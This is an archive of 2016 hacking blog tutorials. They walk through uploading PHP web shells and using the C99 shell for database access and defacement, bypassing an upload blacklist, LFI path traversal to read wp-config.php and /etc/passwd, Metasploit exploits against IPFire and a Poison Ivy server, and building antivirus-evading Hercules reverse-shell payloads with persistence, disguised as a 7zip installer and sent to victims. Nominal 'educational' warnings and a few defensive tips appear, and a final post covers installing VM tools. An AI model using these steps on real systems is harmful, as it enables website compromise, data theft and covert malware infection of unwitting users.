Archives

All posts for the month June, 2016

 

Good morning everybody. In Part 1 of this series, we saw how one of the most popular shells can be used to hack a website. However popularity has its own disadvantages, at the least in the field of cyber security. The C99 php shell is very well known among the antivirus. Any common antivirus will easily detect it as malware. Although it is unlikely that web servers will be installed with antivirus, still it is good to stay one step ahead. So today we will see some of the least popular but still effective web shells.

As you all know, Kali Linux is one of the best pentesting distros available. It would be very disappointing if it didn’t have web shells in its arsenal. Open a terminal and navigate to the directory “/usr/share/webshells” as shown below. As you can see, web shells are classified according to the language of the website we are trying to hack. Today we will see about PHP shells. So go into that directory and do an “ls”. You can see the shells below.

webshells1

Now let us see their features by uploading each one them into web server we want to hack. See how to upload the shells.

  1. simple-backdoor.php

As the name clearly tells, the functioning of this shell is very simple. It is used to execute some commands on the target web server. Let us go to the shell’s link after uploading and execute the “net user” command as shown below. As already used in Part 1, this command gives us all the users present on the Window’s system.

webshells2

Similarly let us execute another powerful command “systeminfo” to get the web server’s whole information as shown below. Sorry about the censor.

webshells3

 

php-backdoor.php

The php-backdoor, as the name implies  is file upload shell just used to add more backdoors. It helps us in the case where we can’t easily upload any additional files we want.

webshells4

I works akin to file upload function in our Part 1. As you can see below, it has upload form and a function to execute commands. We can also connect to the database.

webshells5

 

php-reverse-shell.php

Every shell doesn’t require us to visit the web server. In fact we can make the webserver visit us. Enter the php-reverse-shell. As its name says, it makes a reverse connection to our attacker system. In order for this shell to make a reverse connection, it needs an IP address. So before uploading this shell we need to change the IP address in the script to our IP address ( Kali Linux ) as shown below. Save it and close it.

webshells6

Next, let us start a netcat listener in one of the terminal. If you are new to netcat the command “nc -v -n -l -p 1234” tells netcat to listen verbosely on port 1234. Remember the port number should be same as we specified above.

webshells7

Now when we upload the shell, On kali linux we will get a terminal as shown below. Hit “ls” to see the contents of the directory.

webshells8

qsd-php-backdoor.php

The qsd-php-backdoor is compatible with both Linux and Windows web servers. As we upload it, it will detect whether the web server is Windows or Linux and then acts accordingly. The screenshot is shown below. As you can see we can move to the root directory of web server and come back, execute shell commands and SQL queries.

webshells9

You already know what happens when we execute “systeminfo” command as shown below.

webshells10

That’s about web shells in Kali Linux. Hope it was helpful.

WARNING: This is strictly for educational purpose. Please don’t misuse this.

Good Evening friends. In our previous tutorial RFI hacking for beginners we saw what is remote file inclusion vulnerability and how hackers use this vulnerability to upload files into the web server. In that tutorial, we uploaded a C99 php shell, which is the most popular shell used in RFI hacking. Today we will see further on how hackers upload shell and hack a website. We have successfully uploaded a shell in the above post..

Let us go to the path where we uploaded our shell as shown below.  You should see something as shown below. This is our PHP shell. As you can see, it already shows lot of information about our target system like OS, the web server software, version etc. It also shows all the files in our folder or directory where we uploaded our shell as shown below.

c99shell1

Let us see some of the features of the shell.  The first, second and third tabs are the Home, backward and forward buttons and need no explanation. The fourth tab is the “Go one directory back”. This can be useful in navigating the web server.  I have gone one directory back as shown below.

c99shell2

Imagine there are a lot of files in the directory/folder we navigated into. We can search for a specific file as shown below using the search function.

c99shell3

Using the Tools option, we can open ports on the target server to bind shells.  This can be useful in making remote connections using netcat or any other program.

c99shell5

We can also see the processes running on the web server using the proc function, but this depends on the privileges we acquire on our target. As you can see I didn’t get any processes to see on my target.

c99shell6

Many web servers have FTP server installed. The “FTP brute” option is used to brute force the password of the FTP server if it is available.

c99shell7

The “Sec” option shows the server security information. We can download winnt passwords and crack them using any cracking software. Once again this depends on the privileges we are running as.

c99shell8

The “PHP-code” option is used to execute any PHP code on the web server.

c99shell9

The “SQL” option is very crucial. It allows us to get access to the all important database. We don’t need to crack any credentials. Just click on “Connect” to connect to the database.

c99shell10

As connection is established to the database, we can see all the databases present on the server.

c99shell11

Click on the databases to view all the databases present on the server. Remember we can view all the databases present on the server, not just the database of this website.

c99shell12

Since I have DVWA installed on my server, I have selected that database. As it can be seen, it has two tables. You can select any table and can delete or edit that table.  Hackers can even create new databases and delete the entire databases if you want. There is also a “self remove” option  in this shell. So after doing whatever he wants, hacker can remove the shell from the web server.

c99shell13

Command Execute : 

Now let us see some more tricks of this shell. Scroll down and you will see something called “command execute”. As the name implies, it is used to execute commands on the target OS.

c99shell14

For example, since I already know the target operating system is Windows, let me execute “net user ” command to see all the users on the Windows system.

c99shell15

We can see the result as shown below.

c99shell16

We can also see opened ports on the web server using the command below.

c99shell17

These are the open ports on our target.

c99shell18

Shadow’s tricks:

Just below our “command execute”, we have Shadow’s tricks. These have all the tricks that can be performed on the Linux server’s shadow file. You can see all the commands below. Since we are on Windows we will skip this one.

c99shell19

Preddy’s tricks:

Below Shadow’s tricks, on further scrolling down we have Preddy’s tricks.  This can be used to bypass PHP Safe Mode if it is enabled and execute PHP commands. Enabling Safe Mode imposes several restrictions on PHP scripts. These restrictions are mostly concerned with file access, access to environment variables and controlling the execution of external processes. We don’t have PHP Safe Mode enabled in our case.

c99shell20

Defacing:

The most common thing  hackers ( there’s still a lot of debate whether to call them hackers or not ) do after shell upload is defacing websites. What is website defacement? In simple terms, it is changing the index page of any website. Now what the hell is this index page? It is the first page or default page that loads when we visit a website. It can be either index.php, default.php or home.php ( the extension can even be .html ).

But why is the defacing done? Mostly it can be done to leave a message. For more information on defacing  just Google “Anonymous hacking group” or “defacing groups”. Now let us see clearly how websites are defaced using file upload.

Here, to make it more dramatic, I have navigated to the Vulnerawa directory installed on the same server as shown below. To know more about Vulnerawa, go here.

c99shell21

As you can see below, we are in the Vulnerawa directory and we can see the index.php page below.

c99shell22

Now before defacing, this is the page that loads when we go to Vulnerawa.

c99shell23

Now, open the index page or search for the page as shown below.

c99shell24

As we can see below, we have the index page. Normally it is deleted and a new index page is uploaded. But here, we will edit the index.php page.

c99shell25

This is the content of the index page.

c99shell26

Now I have edited the script as shown below. To the newbies, I am just including an image named “anon.jpg”.

c99shell27

Now upload the “anon.jpg” image as shown below. I am gonna leave my own message dedicated to my favorite superhero.

c99shell28

Once we click on upload, the image is uploaded into the directory as shown below. That’s it we are done.

c99shell29

Now when user goes to the website, he will see this message.
c99shell30

These are some of the things we can do with an uploaded shell.  By now you should have understood how dangerous a file upload vulnerability can be for a website.

How to stay safe?

If you are a website admin, always keep a backup of your website as hackers can sometimes delete the entire website and databases. It is also a good thing to scan your web server for any malicious files since I have seen in many instances that people often restore the website deleted but still keep the shell intact.

In our next howto, we will see more about the shells.

WARNING: This is for educational purpose only.

Good Evening friends. In our previous howto, we have seen about Local file inclusion hacking. Today we will see another file inclusion attack known as Remote File Inclusion or File upload Injection. In LFI hacking, we can just view files locally present on the web server. Only watching, no touching. In RFI hacking, we can upload remote files into the web server.

So if the website is vulnerable to RFI, we can upload any files we want into the web server.  But before we see this practically, take out ten seconds and just imagine if you had an opportunity to upload a file into a remote server what type of file would it be? It should be something which can take complete control of the web server, right.

There enters the PHP shell. It is a shell wrapped in a PHP script. As you will see later, we can use this shell to execute commands or browse the filesystem of the remote web server. Now let us see it practically. Recently, a file upload vulnerability was detected in Roxyman file manager. It is a free open source file browser for .NET and PHP.  I have installed this on a remote server for testing. I am trying to upload the infamous c99 php shell into this file manager.

The c99 shell is a notorious PHP malware. More about what it can do later. Ok, now let’s see how file upload works. Go to file manager and click on Add file as shown below.

rfilfi1

Another window opens. Now browse to the file we want to upload. In our case, the C99 shell.

rfilfi2

But when we click on “upload”, it shows us an error as shown below. Don’t worry, that’s normal. RFI injection has been so notorious that even a noob like me wouldn’t allow a php or any other malicious upload.

rfilfi3

Normally developers use a white list or black list to prevent specific file uploads. Black list is a list of file extensions to be blocked. White list is a list of file extensions to be allowed. Our specific application here uses a black list as shown below. As you can see files with extensions php,php3,php4,php5 and many more are blocked.

rfilfi3a

But it doesn’t mean this type of restrictions cannot be bypassed. One way to do this is to rename our file to something like c99.php.c999jpg to fool the filters that this is a jpeg file. As I already said, this is one of the many ways to bypass the filters. You can just google for more ways to bypass this restrictions. Now the upload is successful as shown below.

rfilfi4

Now you can view the upload file by going to the uploads directory as shown below. See we have successfully uploaded our php shell into the web server.

rfilfi5

In our next howto, we will see what we can  do with our uploaded php shell.

 

Good morning friends. Today we will learn about LFI hacking. LFI stands for Local File Inclusion. According to OWASP,

    “Local File Inclusion (also known as LFI) is the process of including files, that are  locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.”

 Simply put, it is a vulnerability in a web server or website which allows a hacker to view files on the remote system ( where the web server is setup) which ought not to be seen.  LFI is also known as directory traversal as folders are generally referred to as directories in Linux.

  Now let us see it practically. A wordpress plugin called “WP Mobile edition” suffers from lfi vulnerability. I have installed this vulnerable plugin on my wordpress site for testing. Now at the end of the url given below, let’s add files=../../../../wp-config.php as shown below.  Boom, we get a file listed on our browser. I am trying to view the wp-config file of the website.

  Wp-config file is  an important WordPress file. It contains information about the database, like it’s name, host (typically localhost), username, and password. This information allows WordPress to communicate with the database to store and retrieve data (e.g. Posts, Users, Settings, etc). The file is also used to define advanced options for WordPress.

     But wait, what is that dot dot slash notation we used.  The “../” we used below is similar to “cd..” we use in Windows and Linux to go one directory back and serves the same function here. We have gone four directories back to access the wp-config.php file which is located in WordPress root directory.

lfirfi1

Similarly we can view another file: wp-settings.php as shown below. It is located in the same directory as wp-config.php.

lfirfi2

Ok, now let’s view something out of the web server’s context. The hosts file is a computer file used by an operating system to map hostnames to IP addresses. The hosts file is a plain text file, and is conventionally named hosts. It is like a DNS in our OS. We have encountered the hosts file in our previous howto of Desktop phishing.  Now let’s view that file in Windows. After going seven directories back, we have to go forward to the hosts file path as shown below.

lfirfi3

Now let’s see this vulnerability in Linux. The juiciest file most hackers want to see in Linux is the passwd file. The /etc/passwd file is a text-based database of information about users that may log in to the system. We can see the file as shown below.

lfirfi4

Since we normally have minimal knowledge about the target OS  we should use trial and error to view the file we want. That was local file inclusion for you. In our next howto, we will see another file inclusion vulnerability. Until then good bye.

By now, everybody should be knowing what is shellshock vulnerability. To those newbies who have no idea what it is, the shellshock vulnerability affects Bash ( it is the same program you encounter regularly if you are a Linux user, yeah i’m talking about shell or terminal ). Using this vulnerability, hackers can make the affected versions of bash to execute commands written by them.

All versions of Ipfire firewall before 2.15 (including this one ) are vulnerable to this shellshock vulnerability. Now let’s see how to exploit this vulnerability using Metasploit.  This exploit needs credentials. Start Metasploit and load the exploit as shown below.  As you can see, there is only one payload to this exploit, i.e one command as explained above.

shellshock1

Set the required options as shown below. Use check command to see if the target is vulnerable.

shellshock2

Set the command  you want to run on the target machine. I set the command to view the /etc/passwd file of our target. You can set any command you want to run.

shellshock3

How to fix this:

By now, most of the machines may have patched this vulnerability. To stay safe, use the command to check for this vulnerability.

env x='() { :;}; echo vulnerable’ bash -c “this is a test” 

If your machine is vulnerable, you should get “vulnerable” displayed as shown below.

shellshock4

If it’s not vulnerable, you will get the result as shown below.

shellshock5

If you are using Nessus vulnerability scanner, there is a special Bash shellshock detection to check for this vulnerability in multiple devices.

shellshock6

If your bash version is vulnerable, update the bash.

Good evening friends. Firewalls are one of the most important components in the security of a network. Vulnerabilities in firewalls can be more serious. Today we will see one such vulnerability. IPFire is an open source firewall,router and VPN  built form LFS( Linux From Scratch ). All the versions below 2.19 of this firewall suffer from rce vulnerability in proxy.cgi page. Today we will see how to exploit this vulnerability with Metasploit. This vulnerability can be exploited only if credentials are known. So all users using credentials which can be guessed easilly are vulnerable.

Start Metasploit, load the exploit and check the options required.

ipfire

Type command “show payloads” to see all the payloads.

ipfirerc2

Set the required payload.

ipfirerc3

Set the required options as shown below. As already said, we need the credentials and of course the target IP address. After all the options are set, use the “run” command to execute the exploit. We will get the target’s shell as shown below.

ipfirerc4

To test this, type “ls” command to list the contents of the present directory.

ipfirerc5

Good Evening friends. Today we will see how to hack a remote Windows system using a vulnerability in a RAT. RAT stands for Remote Access Trojan and is a type of malware. It works when a hacker sends a malicious file to the victim and he clicks on it. When victim clicks the malicious file, it sends a  connection back to the hacker’s machine. The Hacker can control the victim’s machine using command & control server.  Using RAT’s, the hacker can

  • Block mouses and keyboards
  • Change the desktop wallpapers
  • Downloads, uploads, deletes, and rename files
  • Destroys hardware by overclocking
  • Drop viruses and worms
  • Edit Registry
  • Use your internet connection to perform denial of service attacks (DoS)
  • Format drives
  • Steal passwords, credit card numbers
  • Alter your web browser’s homepage
  • Hide desktop icons, task bar and file

(Data from Wikipedia )

The picture given below should explain the scenario. More about RATs later.

RAT

You can see the command and control server of Poison Ivy RAT below . Poison Ivy is one of the popular RAT’s and many variants of it are still active. It was used in RSA SecureID attack. Poison Ivy RAT  2.1.x versions suffer from a stack buffer overflow vulnerability. Using this vulnerability, the machines running C&C server can be hacked. So here, its a case of hacker getting hacked.

ivybof0

We will learn more about RATS in our next howtos. But now let us see how to hack a Windows machine running a PoisonIvy C&C server with PoisonIvy buffer overflow exploit. Open Metasploit and load the exploit as shown below. The only option necessary is RHOST. As shown below, this RAT runs on port number 3460. Set the RHOST and check whether the target is vulnerable.

ivybof1

Now, as the target is vulnerable, set the payload and hit on Run. You should get the meterpreter on the remote machine as shown below.

ivybof2

WARNING:

This post is for educational purpose only and remember that using this tutorial for any nefarious purpose will land you in prison for three years and a fine of two lakh rupees in India. Concerning other countries, Please refer your respective nation’s Cyber law.

Good news : Regardless of what the title says, this works even on windows 8 and 7

Good evening friends. I wanted to test the security of Windows 10 (actually of its antivirus ). Since remote exploits ceased to exist in Windows operating systems after Windows XP,  it can only be done by sending payloads in portable executables. The biggest challenge in sending these  malicious portable executables is bypassing its security mechanisms. Enter Hercules.

Hercules  is a special payload generator that can bypass all antivirus software. It has features like persistence and keylogger which make it too cool. Named after a Greek Hero, Hercules stands up for its name. In our testing, none of the antivirus was able to detect payload generated by Hercules. Now let us see how Hercules can be used to hack Windows 10 . In Kali Linux, open a terminal and type command git clone https://github.com/EgeBalci/Hercules to clone Hercules into Kali Linux.

hercules1

The tool is cloned into directory called Hercules. Navigate into that directory and view the contents of the directory as shown below. There is a directory called SOURCE. Move into that directory. There should be a file called HERCULES.go.

hercules2

Now type command go build HERCULES.go  to build this file. Remember Linux is very strict, so be careful with uppercase and lowercase. Once you run that command, we will get another file with the same name but without any extension as shown below.

hercules3

Now its time to create our payload. Type command,

./HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic 

Let me explain this command.

192.168.25.146 – IP address of our attacker system ( in our case Kali Linux )

4444 – the port number over which we want our victim system to connect to us.

-p – payload ( in this case, windows/meterpreter/reverse_tcp )

-a – architecture of the payload ( 64 bits or 32 bits )

-l – linking ( static or dynamic, dynamic linking reduces the payload size )

Hit on Enter. Our payload is created in the same directory.

hercules4

Our payload’s name is payload.exe. Type “ls”  as shown below. Now send this file to our victim using your creativity.

hercules5

On our Kali Linux, type command nc -l -p 4444. We are opening a netcat session on port 4444 ( the same port we set up above). Now when the user clicks on our payload, we will get the remote system’s shell as shown below.

hercules6

Type command help to see all the commands we can execute on our target system.

hercules7

For example, type command systeminfo to see all the system settings of our target. This was pretty simple. But this is a one time session, which means once you get out of this session you are disconnected from your victim.

hercules8

So let’s add a little bit reality to our payload this time. Now we will add two things:persistence and embedding.

–persistence – Once our payload is executed by the victim, it will continually try to connect to our attacker system. So we can end the session and start it once again. The only condition is our victim’s system should be on and of course we should be listening.

–embed – we will add a genuine executable into our payload. Type command

./HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic –persistence –embed=/root/Desktop/7z1602.exe 

Here we are embedding 7zip into our payload. Remember we need to send the payload created in SOURCE directory to our victim.

hercules9

So when victim clicks on our payload to install it, UAC will prompt this window( the user should get a whiff here, if he is aware ).

hercules10

When the user clicks on “yes”, the installation will progress normally on the victim’s system.

hercules11

And on our attacker system, we should have already got the victim’s shell as shown below. As I already told, this is a persistent connection. Disconnect the session by typing ‘CTRL+C” and connect again with nc -l -p 4444 to get the session back.  Hope that was helpful. If you have any queries or doubts, please feel free to leave your comments.

hercules12

Good Evening Friends. As of Sept 2015, VMware recommended using the distribution-specific open-vm-tools instead of the VMware Tools package for guest machines. This means that instead of Vmware tools, the users should install openVM tools specific to the guest OS. The makers of Kali Linux  have made changes to  the latest Kali rolling kernel accordingly. These openVM tools have all the needed functionality  such as file copying, clipboard copy/paste and automatic screen resizing are working perfectly. Now let us see how to install OpenVM tools in Kali Linux rolling 2016.

openvm1

Open a terminal and locate the “sources.list” file. Open the “sources.list” file with any text editor. Here I opened with the Vi editor. The command is “vi /etc/apt/sources.list

openvm2

When the file opens, type “i” to get into insert mode. You cannot make changes to this file unless you get into insert mode.

openvm3

Now type “deb http://http.kali.org/kali kali-rolling main contrib non-free” without quotes. Hit ESC, then SHIFT+:wq to save and close the file.

openvm4

Next type command apt-get update. 

openvm5

Then type command apt-get install open-vm-tools-desktop fuse. When it asks if you want to continue, type Y.

openvm6

After installation is over, reboot the system and you will get the screen as shown below. Happy hacking.

openvm7